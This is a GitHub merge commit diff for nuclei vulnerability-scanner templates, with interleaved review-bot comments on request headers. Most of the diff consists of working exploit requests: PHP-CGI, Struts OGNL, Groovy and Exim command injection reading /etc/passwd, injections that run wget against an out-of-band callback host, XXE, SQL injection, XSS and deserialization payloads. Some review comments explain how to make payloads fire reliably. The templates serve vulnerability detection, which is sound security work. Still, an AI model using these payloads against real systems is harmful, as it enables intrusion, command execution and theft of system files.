Merge pull request #2612 from projectdiscovery/cleanups

Removed extra request headers that the templates do not require
patch-1
Sandeep Singh 2021-09-09 14:50:00 +05:30 committed by GitHub
commit 54c9f08233
198 changed files with 146 additions and 1015 deletions


@ -12,24 +12,17 @@ requests:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
Accept-Encoding: deflate
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
extractors:
- type: regex


@ -12,7 +12,6 @@ requests:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and


@ -14,7 +14,6 @@ requests:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
@ -22,7 +21,6 @@ requests:
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");


@ -17,11 +17,7 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}


@ -16,9 +16,7 @@ requests:
- |
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("cat /etc/passwd"); ?>
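Review bot: The `Content-Length: 31` kept on the php-cgi request does not match its body — `<?php echo shell_exec("cat /etc/passwd"); ?>` is 44 bytes — so if the value is sent verbatim the server reads a truncated script and the injected PHP never parses. Either drop the header and let nuclei compute it, or set `Content-Length: 44`. Separately, the proof spawns a shell on the target; a marker such as `<?php echo md5("php-cgi-rce"); ?>` demonstrates code execution without running `cat /etc/passwd`. The matchers are outside the hunk.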


@ -18,10 +18,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,


@ -17,10 +17,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"name": "test"
@ -29,11 +26,7 @@ requests:
POST /_search HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
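Review bot: The `_search` request posts a JSON body under `Content-Type: application/x-www-form-urlencoded`; Elasticsearch 6.0 and later enforce strict content-type checking and reject anything but `application/json`, so the Groovy probe only reaches the node when it is old enough to ignore the header. Change the kept line to `Content-Type: application/json`. `Content-Length: 343` also disagrees with the one-line body on the last line (roughly 170 bytes); if it survives the cleanup it should be removed rather than left stale.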


@ -12,18 +12,12 @@ requests:
- |+
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Connection: close
- |+
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
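Review bot: `Content-Length: 56` is hard-coded on the lost-password POST while the body ends in `{{username}}`, so the real length varies per target and the header is wrong for almost every value; drop it and let nuclei compute it. The `Host:` line is the command-injection payload itself and runs `touch /tmp/success` on the mail host when it fires, which leaves an artifact on the target — a comment such as `# Host header is the mailer command-injection payload; it creates /tmp/success on the target` would make that explicit for operators. Whether the intended proof is that file or an out-of-band callback is not visible in this hunk.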


@ -16,7 +16,6 @@ requests:
- |
GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Length: 4
matchers-condition: and
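Review bot: The Struts OGNL GET still carries `Content-Length: 4` with no body; a server that honors it waits for four bytes that never arrive, and the request times out instead of returning the `cat /etc/passwd` output. Remove the header — `Host: {{Hostname}}` is all the request needs. The matchers continue below the hunk.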
matchers:


@ -17,10 +17,7 @@ requests:
- |
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 160
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate


@ -17,10 +17,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">


@ -13,11 +13,7 @@ requests:
- |
PUT /_users/org.couchdb.user:poc HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 108
{
"type": "user",
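Review bot: `PUT /_users/org.couchdb.user:poc` creates a persistent user document named `poc` on the target — a state change that outlives the scan and appears in `_users` as a foreign account. The template should say so above the request, e.g. `# Creates a user 'poc' in _users; remove it after confirming the finding`, and carry an intrusive tag if the project uses one. The request body and matchers continue outside the hunk.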


@ -16,35 +16,28 @@ requests:
- |
POST /maint/index.php?packages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
- |
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: {{Hostname}}/maint/index.php?packages
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
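Review bot: The `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=` header decodes to `maint:password`, so both traversal requests only work where that default credential is still in place — a precondition worth stating, e.g. `# Uses the default maint:password credential; the traversal is post-auth`. The hard-coded `PHPSESSID`/`ARI` cookie values are replay artifacts from the original capture and mean nothing on another host; they can go with the other headers. The `root:.*:0:0:` regex combined with status 200 is a sound proof for the `/etc/passwd` read.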


@ -13,10 +13,7 @@ requests:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
@ -34,9 +31,6 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip,deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
req-condition: true
matchers:


@ -14,11 +14,9 @@ info:
requests:
- raw:
- |
GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Connection: close
payloads:
endpoint:


@ -16,10 +16,8 @@ requests:
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
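Review bot: The wls-wsat request declares `Content-Type` twice (`text/xml` on the third line and `text/xml;charset=UTF-8` further down); whichever the server picks, a duplicated header is a needless ambiguity — keep only `Content-Type: text/xml;charset=UTF-8`. The `User-Agent` and `Accept` values also end in a stray `,`, which looks like a paste from a list; if they are meant to survive, drop the trailing commas. `Content-Length: 873` cannot be checked here because the SOAP body continues past the hunk.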


@ -13,11 +13,7 @@ requests:
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:


@ -17,10 +17,6 @@ requests:
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers:
- type: word


@ -13,12 +13,8 @@ requests:
- |
GET /__ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
matchers-condition: and


@ -18,78 +18,42 @@ requests:
- |
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
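Review bot: The six `eval-stdin.php` requests are byte-identical apart from the path prefix, and each repeats `Content-Length: 17` for a 30-byte body (`<?php echo md5(phpunit_rce);?>`); the stale length is either ignored or truncates the script, and the duplication means any future fix must be applied six times. Express the prefixes as a payload list and keep a single raw request, letting nuclei compute the length. Whether the template already sets `attack:` or `stop-at-first-match` is outside the hunk, so add the latter only if nothing above already does. The matchers follow the hunk.
```yaml
    payloads:
      prefix:
        - ""
        - "/yii"
        - "/laravel"
        - "/laravel52"
        - "/lib"
        - "/zend"
    stop-at-first-match: true
    raw:
      - |
        GET {{prefix}}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html

        <?php echo md5(phpunit_rce);?>
    # … unchanged: matchers …
```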


@ -12,21 +12,15 @@ requests:
- |
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
{
"type" : "read",
"mbean" : "java.lang:type=Memory",
"target" : {
"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
"type":"read",
"mbean":"java.lang:type=Memory",
"target":{
"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
}
matchers-condition: and
@ -35,6 +29,7 @@ requests:
words:
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
part: body
- type: status
status:
- 200
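Review bot: Compacting the JSON body changes its byte length, yet `Content-Length: 167` is still shown in the hunk; if that header survives it now disagrees with the body, and `Content-Type: application/x-www-form-urlencoded` was never right for a Jolokia JSON POST. Drop the length and set `Content-Type: application/json`. The matcher on the literal `CommunicationException: 127.0.0.1:1389` string is a reasonable proxy that `target.url` was dereferenced, but it only proves an outbound connection attempt to loopback, not that the JNDI lookup would reach an attacker-controlled listener.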


@ -17,8 +17,6 @@ requests:
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd


@ -12,8 +12,6 @@ requests:
- method: GET
path:
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
matchers-condition: and
matchers:


@ -15,8 +15,6 @@ requests:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
@ -24,8 +22,6 @@ requests:
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}


@ -15,10 +15,6 @@ requests:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B


@ -15,7 +15,6 @@ requests:
- |
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:


@ -15,7 +15,6 @@ requests:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
matchers:


@ -13,7 +13,6 @@ requests:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
@ -21,6 +20,7 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
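Review bot: The empty `Host:` line together with `unsafe: true` is the whole trick here — raw mode sends the headers verbatim instead of normalizing them — but nothing in the template says so, and a later cleanup could "fix" the Host header. Add `# Host is intentionally empty; unsafe: true keeps nuclei from rewriting it` above the request. The `root:.*:0:0:` regex plus status 200 is an adequate proof for the file read.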


@ -19,13 +19,10 @@ requests:
- |
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
- |
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
extractors:
- type: regex


@ -12,13 +12,10 @@ requests:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 626
Connection: close
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"


@ -14,11 +14,6 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin
matchers-condition: and


@ -16,14 +16,7 @@ requests:
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
@ -32,6 +25,7 @@ requests:
- type: status
status:
- 200
- type: word
words:
- '><script>javascript:alert(document.domain)</script>'


@ -22,7 +22,6 @@ requests:
- |
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
@ -30,8 +29,6 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and


@ -17,8 +17,6 @@ requests:
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:


@ -13,14 +13,9 @@ requests:
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://{{Hostname}}/
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Connection: close
Upgrade-Insecure-Requests: 1
user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2


@ -12,9 +12,6 @@ requests:
- |
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Content-Length: 1
Connection: close
echo
echo


@ -13,41 +13,27 @@ requests:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/
Upgrade-Insecure-Requests: 1
Referer: {{BaseURL}}
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/login_pic.asp
Referer: {{BaseURL}}/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/login_pic.asp
Referer: {{BaseURL}}/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
matchers-condition: and
matchers:
- type: regex
@ -55,6 +41,7 @@ requests:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:


@ -13,7 +13,6 @@ requests:
- |
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
payloads:


@ -11,14 +11,11 @@ requests:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {


@ -16,7 +16,6 @@ requests:
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">
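Review bot: `Content-Length: 76` is hard-coded on the XXE POST while the body embeds `{{interactsh-url}}`, whose length differs on every run, so the declared length is wrong whenever the template executes. Remove it and let nuclei compute the real size. The DOCTYPE body and matchers continue past the hunk.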


@ -12,12 +12,7 @@ requests:
- |
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
